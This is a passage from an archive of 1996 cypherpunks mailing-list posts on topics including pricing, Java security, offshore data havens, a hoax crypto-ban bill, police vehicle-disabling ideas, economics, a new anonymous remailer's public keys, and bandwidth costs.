>instead of 10 for the regular one.  This was achieved (as was found by
>independent testers, and was not advertised by IBM) through the
>addition of additional chips to the E version that did nothing but
>slow down processing.  Thus the E model cost more to produce, sold for
>less, and was less useful.  However, as Deneckere and McAfee show in
>their paper [DeneckereM], which contains many more examples of this
>type (referred to as "damaged goods"), it can be better for all
>classes of consumers to allow such behavior, however offensive it
>might be to the general notions of fairness.  Consumers who do not
>need to print much, and are not willing to pay for the more expensive
>version, do obtain a laser printer.  Consumers who do need high
>capacity obtain a lower price than they might otherwise have to pay
>since the manufacturer's fixed costs are spread over more units.

I too find this concept offensive, at least to the extent that it is kept a 
secret from the marketplace. Even so, as a libertarian and free-market 
capitalist, I certainly see nothing wrong with "allowing such behavior," and 
indeed  I'd see something wrong with NOT "allowing" it.  Nevertheless, to 
the extent it occurs it should be well understood and identified for what it 
is.

You might recall the Intel 386SX microprocessor, which was the 16-bit-bus 
version of the 386 DX, which itself had a full 32-bit bus.  At the time the 
DX was selling for many hundreds of dollars, probably about $3-400 or so,  
Intel sold the SX for about $80.  However, chances are good that the only 
difference internally between these devices is the bus interface unit, so 
the size and complexity of these two chips would have been virtually 
identical, and thus their costs would likewise be the same.  The reason for 
their vast difference in price was this "damaged goods" concept.  (A similar 
situation occurred with the 486SX versus the 486DX.)





Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Tue, 13 Aug 1996 06:06:29 +0800
To: cypherpunks@toad.com
Subject: Re: Fun with M$
In-Reply-To: <199608121526.LAA07380@granite.cyg.net>
Message-ID: <9608121727.AA18460@outland.ain_dev>
MIME-Version: 1.0
Content-Type: text/plain



> I don't see how anyone can call this a bug. Microsoft has chosen what Sun
> should have: leave the security to the user, don't take it away from

	Good, leave it to Joe Sixpack who can bareley figure out how
to move files around without deleting half of the system directory . . .

> everyone. Java has been sverly crippled by the removal of features that
> would have made applets truly usefull, like local disk access. By leaving

	Java has local disk access.  Java _APPLETS_ are not allowed to
access local disk (among other things) if the class is loaded from a
network source.  A class which is loaded from local disk has no such
restrictions.

> these abilities and allowing the user to choose whether or not to run the
> object, leaves the trusted objects to be truly usefull. Microsoft has even
> designed a system of trust verification for these objects throught the
> trust chain and the MS download service. For details on the MS download
> service look at the july 96 issue of Microsoft Systems Journal. Security
> should be a user/parent decision not a general ban to protect a few.

	You are just a free to grab the Java class files for an applet
and store them on your local disk as you are a CaptiveX component and let
them have full run of your system.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Yanni" <jon@aggroup.com>
Date: Tue, 13 Aug 1996 08:09:57 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Unmetered Net Usage
Message-ID: <9608121340.AA47329@jon.clearink.com>
MIME-Version: 1.0
Content-Type: text/plain


> So it seems to me that within 5 years or so, there ought to be a
> powerful incentive to wire up apartment complexes and business parks
> with alternative Internet/Internet-telephone connections, ones
> which bypass the phoneco for at least the first few hundred feet.
> This, possibly in concert with a ISDN-driving concentrator or
> a cable-modem, should reduce the cost of the customer-to-the-ISP line to
> a very low value.
>
> Jim Bell
> jimbell@pacifier.com

I can see it now. Apartments full of geeks because the apartments
were originally built with 100BaseX to each place and a T3 in the
basement going direct to the local ISP.

Tack on another $200/month or whatever to the apartment cost ( geeks
can afford that for sure ) and one might end up having a pretty nice
online melrose place.

I wonder if anybody has done that yet...

-jon


Jon (no h) S. Stevens        yanni@clearink.com
ClearInk WebMagus      http://www.clearink.com/
finger pgp@sparc.clearink.com for pgp pub key
We are hiring!
http://www.clearink.com/clearink/home/job.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an584514@anon.penet.fi
Date: Tue, 13 Aug 1996 03:04:25 +0800
To: cypherpunks@toad.com
Subject: Re: Rumors of death of Anguilla Data are greatly exagerated.
Message-ID: <9608121346.AB00628@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



Vince says:

>  And Anguilla is first and foremost a taxhaven.  But it tries hard to be a
>  very clean taxhaven (does not want drug money etc).  I think that "clean"
>  corporations operating here tax free is a potentially huge market.

This is an illusion.  There ain't no such thing as a clean corporation
operating in a clean tax haven.  Every overseas corp that is doing
something they can't do without interference back onshore, is running the
gauntlet.  Remember, its my moral choice as to whether its dirty, and
if I am sitting in some Washington quango office, and I decide its
dirty, then it is.  Plus its my job to fight it, and I'm not afraid
of a dirty fight.  And I got a list of contacts who've got friends
who've got favours to call in...

But you must know this, don't you follow the machinations that USG
pulls in the region to try and close down the arbitrages?

>  Anguilla and OIS are not the data haven of cypherpunks wet dreams. Neither
>  Anguilla nor I want "hit men for hire" advertising here. Sorry Tim.  And I
>  think the loss in clean business would outweigh any money from such by a
>  long shot.

Nobody's talking about things that every body agrees are no-go.
Shooting people is generally considered not acceptable.  So please
don't change the subject.

What we are talking about is a fairly harmless concept.  An obviously
"fake" passport that is designed to fool the supposedly ignorant peasant
terrorist when they wave grenades on the some flight from Miami, now
going to Havana.  It's a laughable concept, and one that most western
governments have sniffed at and not lifted one finger to even warn about.

OK, so there is a chance that a dumb clerk in a bank could be fooled.
Still, opening a bank account with such a person could be done any number
of ways.  It's equally possible to imagine the Honduras passport being
used to escape some sudaka warzone, without being shot for a gringo.
Remember PGP?  It was used for liberty, crime and freedom, all at once.

>  One simple example is that OIS was given a project Gutenberg CD-ROM and
>  may sell online copies of old books.  Some countries are extending
>  copyrights back further into the past.  Anguilla is not.  So we could sell
>  books that have expired copyrights in Anguilla but not expired in USA etc.
>  Think regulatory arbitrage.

Crap.  It's obvious what book your talking about, if you get Europeans
down there.  It's about as harmless, or harmful, as "kill the Queen"
rants, again its my moral choice.  If a phone call from your lawyer
causes such good responses, then there is no problem about getting
this one made out-of-stock.  Do you have a lot of tourists then
from *that* place?  What's the GDP take for the holiday trade anyway?

>  Taxhavens are a huge and well understood market.  Datahavens are still
>  new. Not counting gambling, they may only be $0/year rounded to the
>  nearest million.

The distinction is irrelevant.  What are you going to do to protect
my business?  Now I know.  SFA.  I may be asking you for data
protection, but my profits, which (might) pay you, come from a
long line of other businesses.  We're not all geeks.

Tim makes good points, especially as he is not (as far as I can
see) in the trade.  When my company does business with such
a jurisdiction, we look for the list of things allowed and the list
of no-nos (which we respect).  Then we look at the history of how that
country stand up to its word.  One thing is what they say, then
another is what they do.  It's surprising how easy it is to see
just how much a place really wants your business for the long run.

I will say this, it ain't really your fault that this happened.
The webshop was too bright, too blatent.  He talked to toublesome
scam reporters.  That sort of thing is going to bring in trouble.
Softly softly catchee monkey is what is needed.

Then when the phone rang my guess is it all happened to quickly.
You win some you lose some.  Lets not make a bad story get worse.

Even though this is not a happy post (Anguilla was on our list)
we still would like you to suceed.  Our advice, worth what you
paid, is don't advertise this event, one bad storm doesnt sink
a ship.  Take a look at all your webpages and tone down the
noisy ones.  Tell them to camoflage their location, no pun intended.

Then, get down to your lawyers office and sit down over a beer
and work out how your going to handle this thing next time.
Properly.

Publish (quietly but definatively) your list of no-nos (ok,
that's already said).  Think about what new shops want to do
and talk it over with your man down at the bar (so you can
predict the attacks).  Learn some negotiating skills, soften
the blow from both ends.  Nothing I'm sure you hadn't thought of.

Cheers,
sorry for anonymity, but as I say, its softly softly in this game.
Wish you luck.
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 13 Aug 1996 01:22:42 +0800
To: cypherpunks@toad.com
Subject: Re: Unmetered Net Usage
Message-ID: <199608121357.NAA17415@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Science, August 2, reports on Net traffic jams and various schemes to ease
the flow, including  pricing correlated to speedier service. 
 
 
See: 
 
 
http://www.sciencemag.org/science/scripts/display/full/273/5275/585b.html 
 
 
 
The report is part of a special section on computer use in science, with
three others on the Internet. 
 
 
For the full section see: 
 
 
http://www.sciencemag.org/science/scripts/display/full/273/5275/585.htm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Tue, 13 Aug 1996 08:15:58 +0800
To: cypherpunks@toad.com
Subject: Re: A ban on cryptography?
In-Reply-To: <ae34bfd606021004239d@[205.199.118.202]>
Message-ID: <199608122059.NAA03158@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



tcmay@got.net (Timothy C. May) writes:
>Anyone know anything about the status of this bill?

>--begin bill excerpt--

>S.1666

>Department of Commerce Authorization Act for Fiscal Year 1997 (Passed by the
>Senate)

>SEC. 1042. PROHIBITION ON THE DISTRIBUTION OF INFORMATION
>RELATING TO USE OF CRYPTOGRAPHY FOR A CRIMINAL PURPOSE.

It's bogus.  THOMAS (http://thomas.loc.gov) shows S.1666 as a Hatch-sponsored
bill introduced 04/15/96:  A bill to authorize the Federal district court
for the Central Division of Utah to hold court in Provo and St.  George.

	Jim Gillogly
	20 Wedmath S.R. 1996, 20:59




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 15:16:16 +0800
To: David Kennedy <76702.3557@compuserve.com>
Subject: Re: Hoax: A ban on cryptography?
Message-ID: <ae354cda0c021004454b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:37 AM 8/13/96, David Kennedy wrote:
>My mailer thinks the e$pam list pulled this from cypherpunks:
>

And I'll bet you're still looking for "Oceania" in your atlas?

This is one of the main reasons I hate it when my articles get "spammed" to
other lists, lists where people have no idea of who I am and no idea of my
sense of humor.

For the clueless, I simply took the "Defense Authorization" bill which had
been posted to Cypherpunks by geeman@best.com and replaced a few of the
words involving "explosives" with "cryptography." Oh, and I twiddled the
number of the bill to include "666." Finally, I even said "This may not be
real, but it could be" at the end.

Jeesh.

The worst part of having my stuff spammed, e-spammed, gurgitated, and
regurgitated is that I get letters from people saying "I saw this thing you
wrote on the Kangaroo Hopping List. What is "crypto"? Thanks a bunch,
dude."

Wake up.

And for those who forward my stuff, please include appropriate disclaimers
to your "spammees" that a) one should read things with an appreciation that
a post may be tongue in cheek, b) that back-spamming to another list is not
cool, and c) that I don't want to be bothered.


>>>                                             S.1666
>
> Department of Commerce Authorization Act for Fiscal Year 1997 (Passed by the
> Senate) <<
>
>And this is bogus, and as far as I can tell not a typo, it's complete hokum.
>
>S.1666 is an obscure bill about courts in Utah.
>
>A search of http://thomas.loc.gov on "encryption" reveals the expected bills,
>PRO-CODE etc.
>
>A search for the DoC Authorization Act reveals nothing, as far as I can tell
>this bill has not been drafted let alone passed. I don't know enough about how
>the DoC is funded to know if they get their own Authorization Act or receive
>authorizations piecemeal and by the reconciliation.
>
>Again, this is bogus.
>
>!^NavFont02F02350014QGHHG|MG~HG85QG87HI}2126

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 16:01:54 +0800
To: cypherpunks@toad.com
Subject: Re: Police prepare stunning end for high-speed car chases
Message-ID: <ae354f9a0d021004ea93@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:43 AM 8/13/96, jim bell wrote:
>At 09:54 AM 8/12/96 -0700, Timothy C. May wrote:
>
>>
>>(And I'm not ignorant of such technologies, having attended several of the
>>Nuclear and Space Radiation Effects Conferences. I also played around with

>Why would you need an "EM Cannon" for this?  Just string a 1-car-sized loop
>of wire on the surface of a road, and off in the bushes hide a battery,
>DC-to-Hi voltage DC converter and 20kv+ capacitor, and a vacuum switch or
>some other switch arrangement.  When the car in question traverses the loop,
>short the switch and the car will be blasted with 20,000 volt-turns of
>induction.  Sure, most of it will pass harmlessly through the car's steel,
>but even iron has a limited "mu" which means that every electrical device in
>the car will be subjected to a certain amount of induced EMF, probably
>enough to at least reset a few microprocessors and possibly even destroy them.

Well, we're all operating based on speculation, as to intended modes of
operation, what the contracts may ask for, what may eventually get
delivered, etc.

Certainly the described mode, that of a police car _pursuing_ another car,
suggests a car-launched signal. Rewiring the nation's roads to include
buried cables in anticipation of a future use would be pretty expensive!

(And if the cops can plan for a suspect/fleeing car to pass a specific
location, low-tech solutions like laying a row of caltrops across the road
will do much the same thing as "zapping" (which may not even work.))

As to high-voltage zapping, on this I am _extremely_ skeptical, at least as
Jim's proposal above goes. Modern chips are equipped to deal with
high-voltage, having electrostatic discharge (ESD) provisions. Voltages a
lot higher than 20kv.

And getting this hv signal in to the interior of the engine compartment,
and past the various thermal and other shields would be a chore. Certainly
the rubber tires will provide an _awful_ lot of insulation!

No signal at the road level is going to get through the tires, at least not
until the dielectric breakdown of several inches of rubber and air is
achieved!

(And even then, what is the current path? Where does the current coming up
from the road surface go? Even lightning strikes, from above, where the
place for the current to flow is clearly down into the ground, have
virtually no effect on cars and especially not on the insides of cars.)

If cars routinely survive lightning strikes, involving hundreds of
thousands of of volts and fairly substantial currents, then I can't imagine
anything humans can plausibly do along the same lines having any effect.

I won't debate this further, though. I don't know just what the DARPA (or
whomever) contract is asking for. Maybe something can be built, maybe not.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julian Assange <proff@suburbia.net>
Date: Mon, 12 Aug 1996 15:55:51 +0800
To: unix_code@geocities.com (Unix_Code)
Subject: Re: Read; NOW
In-Reply-To: <2.2.32.19960812022931.006d7320@mail.geocities.com>
Message-ID: <199608120432.OAA01745@suburbia.net>
MIME-Version: 1.0
Content-Type: text


> 
>         Hi I'm Unix Code and have a few things to ask...(it may not go with
> Cryptography but go ahead and read)

Sad.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iang@cs.berkeley.edu (Ian Goldberg)
Date: Tue, 13 Aug 1996 09:19:55 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Newspapers and basic science (was: US Power Outages)
In-Reply-To: <v02120d06ae344a4cc94e@[192.0.2.1]>
Message-ID: <4uo8jp$t5o@abraham.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.3.89.9608112235.A16390-0100000@netcom3>,
Z.B. <zachb@netcom.com> wrote:
>Now that may not sound like too much, but 
>the lines were carrying at least 3000Mw of electricity, enough "to power 
>3-1/2 Seattles for a day" (quote from local newspaper).

<GRUMBLE>
Watts are a measure of energy per unit time; it makes sense to say
"60 W powers a light bulb", not "60 W powers a light bulb for one hour".
</GRUMBLE>

But my _favourite_ example of this was a newspaper clipping I used to have
that said that in the previous month, the city had received "160 square
pounds of rain".   That just defied common sense.

   - Ian "closely followed by temperatures 'doubling' (which happens more
          often when they use Celcius)"

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMg+llkZRiTErSPb1AQHvDwQAqdxKaHm4PewE6e78gAGNTs/bBsbnXbKt
+kIpplEjU70eK+zREpbvemc2//dEkH4ilW1FKvkWef7Tc06kPghEHp5HfWGCq/oq
Je85MyEOrqrnoADO0ehS5iqnyLFb5lRX5ksciv+GtV4GcS8vnRF3m0ulQZONKBSG
9/wqC6Pmbgc=
=ozoT
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 17:25:09 +0800
To: cypherpunks@toad.com
Subject: Re: "X-Ray Gun" for imperceptible searches
Message-ID: <ae355e0d0e0210044fa6@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 AM 8/13/96, Alan Horowitz wrote:
>CCW holders don't have a legal right to conceal their possession of
>weapon, from the police.
>

I think the earlier remark was oriented toward "not scaring the horses"
rather than making a serious attempt to hide the presence of a gun from a
duly-authorized search.

People who carry concealed are _strongly_ encouraged to keep the fact of
their concealed carry hidden. No "careless" displays in bars, for example.
And no announcement to casual bystanders, and even to store security
guards.

The reason for this is simple: to avoid panic and overreaction ("He's got a
gun!!") and also to avoid having a concealed weapon used in a brandishing
situation to intimidate others.

Seen this way, the widespread deployment of metal detectors, millimeter
wave detectors, and other such gadgets would force major changes in CCW
laws.

Aside from the Constitutional issues, which are major.

I don't see how "remote scanning" of the population at large, without
probable cause, is much different from the cops listening in from a
distance with parabolic antennas. Both cases involve detection of signals
emitted from the target. And yet such long-distance interception is not
allowed without a warrant.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Tue, 13 Aug 1996 03:41:54 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: Police prepare stunning e CUT_ags
Message-ID: <199608121531.PAA22889@pipe5.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei <trei@process.com> Wrote: 
 
 
On a more speculative note,  many years ago Harlan Ellison wrote an  
anti-statist short story entitled '"Repent Harlequin!" cried the Tick-Tock 

Man.' , in which the government required all adults to be surgically fitted
 
with 'cardioplates', which allowed the state to turn off the hearts of   
uncooperative citizen-units by radio. 
 
-------- 
 
 
NYP reports today on the thriving market for Radio Frequency Identification
(R.F.-ID) tags. 
 
 
And FiTi reports today on tagging cattle, tracking meat from cradle to
abbatoir, to ward off mad cow assassination politics. 
 
 
Are these precursors of CU body-tags acoming from ARPA labs? E-Systems and
a bunch of comp-conspirators just got supercalifrigalistic HPCC contracts. 
 
 
----- 
 
 
For the NYT and FiTi reports, see: 
 
 
http://jya.com/cutags.txt 
 
 
CUT_ags 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 13 Aug 1996 17:44:21 +0800
To: cypherpunks@toad.com
Subject: Re: AW: National Socio-Economic Security Need for Encryption Technology
Message-ID: <ae3565a5100210041871@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:35 AM 8/13/96, Perry E. Metzger wrote:
>Bart Croughs writes:
>> I would be proud if I had discovered this axiom, but alas, I haven't.
>> It's an axiom that is generally accepted among austrian economists
>> (Rothbard, Hazlitt, etc). I don't know who actually discovered it.
>
>The truly hysterical part is that Tim and I are both (from what I can
>tell) Austrians.

Indeed. While Perry and I disagree on some things, the relevance of the
Austrian School of Economics, and its University of Chicago satellite
campus, is not one of them.

If Croughs stays on this list long enough, he will surely see this. (And
find plenty of references to Hayek, Menger, Friedman, etc., in the
archives.)

The problem with the "Croughs Axiom" is not that there is not a _general_
correlation between average national wages and average national capital
investment--there is. A scatter plot of wages vs. capital investment for
the 200 or so nations would almost certainly show that the Ivory Coast has
low per capita wages and low per capita wages, Sweden has both higher wages
and higher capital investment per capita,  and so on. Correlation, of
course, is not causation.

No, the problem was that Croughs invoked this general _correlation_ (which
can arise for various reasons) to support his mercantilist protectionist
ideas. (He also didn't say he was talking of nations, which is why some of
us found the examples we did, e.g., MacDonald's vs. law firms, which have
the opposite correlation he described.)

And the cloud of ideas connected with somehow forcing capital investment to
remain in the U.S....well, the best way to do this is to alter the tax laws
so that America (for example) becomes a magnet for investment. (If one is
looking to help America, that is.)

In any case, the original notion, of somehow using cryptography policy to
support U.S. interests....well, I rather doubt that Menger, Von Mises,
Hayek, Hazlitt, or any of the others connected with the Austrian School
would buy Crough's protectionist arguments.

And I certainly know that jingoistic appeals to "America First!" are
inconsistent with the sentiments of many or even most on this list.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Johannes Kroeger <jkroeger@squirrel.owl.de>
Date: Tue, 13 Aug 1996 04:47:21 +0800
To: remailer-operators@c2.org
Subject: New mixmaster/ghio remailer mix@squirrel.owl.de
Message-ID: <19960812160526.19277.qmail@squirrel.owl.de>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've installed a Mixmaster/Ghio remailer combination on my
Linux machine with the address mix@squirrel.owl.de.

Here are the public keys:

 Type Bits/KeyID    Date       User ID
 pub  1024/0B11B275 1996/08/08 Squirrel Remailer <mix@squirrel.owl.de>

 -----BEGIN PGP PUBLIC KEY BLOCK-----
 Version: 2.6.3ia

 mQCNAjIJ8IkAAAEEAJvmQTdUL2iLpKmZcnrtQuQWdw1zqt7oYVqkWeFa8J0qrunP
 smKvfTXmo52y2leLxbKZ6efADvrKq9ThXGF6qREVIdzTOnRYsVIwSSJjqBiDykAU
 cz8y/rEDes0oty4TRhysve976RwF3dLK7WU0RrDFj3VBLMhzyiQ+wVoLEbJ1AAUR
 tCdTcXVpcnJlbCBSZW1haWxlciA8bWl4QHNxdWlycmVsLm93bC5kZT6JARUCBRAy
 DQ4gvA9InihC/mkBAUlnCACgdpUBabYF9mQPaBC69YGxvcmoYQUxtqj7HlSpAAMr
 l0HlPNVUHuSqgo3Wo54uIHc4fFA2JYyxi/qETrQU5sHGOHq63H66uPylyzTLfE5v
 uIzbMuikNL2f9SIpdPamW2b+4Jep8UNlSGN0hKtbyedBDClJfPYbCXn9FKgwFcoo
 UyPTcfiAsV1f97cTGFM88thUVv6pAYNO4quangxnBEtdwY/mrr1xefw36TiC1yPo
 PNItxHEFRFxD2aEG5vA5hjRp/Sz5ZXZiY8K9X7hlt+n3MUXfKKz/OldWtF+Q9fOg
 a8Kmqj+duqlS2A4NbWp9emujOEzn2giI7+13B8MEyzVliQCVAgUQMgnwiSQ+wVoL
 EbJ1AQFKYwP/XqOGRvvjyd3anh42iAG0SASP9e/fIjD8bCymdEhJHdAsNy0H06ns
 oaLtH20tHN4BAgUo9i9H8h11+AygF4iJokGz1coP2BJI/O2o7YxR8SBWwk1SSrCb
 utbsi00uz/7QN1zb7Gn/sowUahhBsmhbJbkuur6EB5shBqyq0m/5jVE=
 =MqM9
 -----END PGP PUBLIC KEY BLOCK-----

 =-=-=-=-=-=-=-=-=-=-=-=
 squirrel mix@squirrel.owl.de 072821bee96df27f9defd3b41d216ac2 2.0.3

 -----Begin Mix Key-----
 072821bee96df27f9defd3b41d216ac2
 258
 AASyQ7WwBpuGeDdEHnfEZO3WXHbGWbtyz0EKeImP
 moWsMhfky9H/GoFt3qH10HsH2Hf5TbZBQFim7P2F
 cgvKNiitUwihSyZcTQEDPbhEIWMQCZdBZLDO8zId
 eAg3TUhwhHfjdILNyhMTOMyqZQckY+mrUTboT/z3
 nloJJdC4PSHPiwAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAAAAAAAAAAAQAB
 -----End Mix Key-----

The Ghio remailer has the following features:

$remailer{"squirrel"} = "<mix@squirrel.owl.de> cpunk mix pgp hash latent cut ek"

My connection for email is via a UUCP link that is polled every two hours.
Do not expect quick turnaround of remailed messages.  List pingers
please note.  This can be a disadvantage or an advantage depending on your
needs and expectations.

Please read the help file before using the remailer.
You can get it by sending an empty mail with subject "remailer-help"
to mix@squirrel.owl.de.
I adapted and extended the original remailer help files and inserted a
section about reply blocks and pseudonyms.

C'punks, please mail questions and comments directly to me, as I'm
not subscribed to the cypherpunks list.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3ia
Charset: latin1
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQEVAgUBMg9WB7wPSJ4oQv5pAQFoTgf+NABhSyEDQyzLoAC/FVDSvhSJtdbaXMFz
vQOxVpUk9DllNpDIkW8Wj/rdH7QDk2vma8bNAaBD3/7HOs8ygFLWlLC3ZB48TpTK
ghd/JT8VTvnHHQ3uM3XyXEwLkykTyJJhDuDBbnVzczCwEGQaaz/cpdQInVzQIOc7
GTNyRGGJX4ILzHNH5hfxZTDMfgCjF1qpvSqgT1qibhbViCH05zT4yykKcl83KE4v
M8bFGrw86CUrLoUww5xTmiRIvHbUFCtwwrvjAktAX1U6jUyrJjn8qsyPj8lvA9eB
qaRD1PwjJg57QYAkrHl0H11owpUZDPW7y76mBKYzQofPBCIuAkuW6g==
=zgfG
-----END PGP SIGNATURE-----

-- 
Johannes Kroeger		<jkroeger@squirrel.owl.de>
Send me mail with subject "send pgp-key" to get my PGP key




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 13 Aug 1996 10:35:28 +0800
To: "Thomas C. Allard" <cypherpunks@toad.com
Subject: Searches
Message-ID: <2.2.32.19960812200659.008927dc@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:17 PM 8/9/96 -0400, Thomas C. Allard wrote:

>	In a landmark decision a federal court in New York has ruled
>that a CBS film crew and Secret Service agents are liable for filming and
>broadcasting a search of a private citizen's home. It is the first reported
>court decision to hold a television broadcaster liable for accompanying
>police agents on a search and filming it for the broadcast.

Just because someone at your door has a warrant or a contractual right to
search your place does not require you to allow anyone else in.  Par example:

Landlord of (A Member of This List):  The fire inspectors are here and would
like to inspect your apartment.

(A Member of This List):  They got a warrant?

Landlord of (A Member of This List):  No.

(A Member of This List):  Then they can't come in.

Landlord of (A Member of This List):  But I can enter the apartment with
reasonable notice under the rental agreement.

(A Member of This List):  You're welcome.  The Fire Inspectors aren't.

Landlord of (A Member of This List) who allowed a search of the rest of his
building was cited by the Fire Inspectors for an illegal apartment in the
basement.

DCF

"Why is it that when I'm faced with a reasonable request from a public
servant my immediate response is 'Load triple cannister'?"
  -- Cannister.  A cylindrical metal container filled with lead shot.
Designed to turn a field artillery piece into a very large shotgun.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Tue, 13 Aug 1996 05:01:03 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: (Off Topic) Re: FCC_ups
In-Reply-To: <199608120538.WAA29683@dns2.noc.best.net>
Message-ID: <Pine.BSF.3.91.960812153240.26183B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 11 Aug 1996, James A. Donald wrote:

> At 02:34 AM 8/12/96 -0400, Rabid Wombat wrote:
> > Anyone that wants to carry a large volume of traffic via the 'net will
> > find that either the market will dictate that they pay for the bandwidth
> > they use, or the FCC will. I don't see the FCC getting involved, unless
> > the "phone service via internet" providor tries to use the courts to get
> > out of paying for the bandwidth they use. 
> 
> Bandwidth costs almost nothing, unless you are doing full motion
> video.
> 

I disagree - the cost doesn't stop w/ the cost of the circuit itself - 
installation, CPE, maintainance, management, customer service (re the 
purchaser of the bandwidth, not the "voice customer") all contribute to 
the cost. None of these costs are realy "fixed" - all are fixed+marginal, 
so the costs increase as bandwidth is added.

Also, I've worked with a number of large sites, as well as a large ISP - 
the amount of RealAudio traffic is amazing.

> What is expensive is cutting that bandwidth up into little pieces 
> and delivering those pieces to the people who want to use it at
> the time that they want to use it.

Yes, but having enough bandwidth to service your customer base means 
having enough bandwidth to service peak periods of demand - otherwise, 
customer satisfaction will be low. What is your point? If x bandwidth is 
sufficient during "off-hours", but 6x bandwidth is needed for peak 
periods, then either the voice providor leases 6x bandwidth, or a 
higher-tier providor must provide the capacity for 6x bandwidth, and 
lease "bandwidth on demand" to the voice providor. The infrastructure 
must still support 6x bandwidth, with accompanying costs. Do you think 
"BigTelco" will lease bandwidth on demand without charging more for high 
levels of use during peak hours? Not on a large scale.

This reminds me of the old arguements that "bandwidth costs would come 
down so fast that the Internet would be essentially free."  Haven't seen 
that happen yet, either.

> 
> Thus those who retail bandwidth will have the bulk of the revenue,
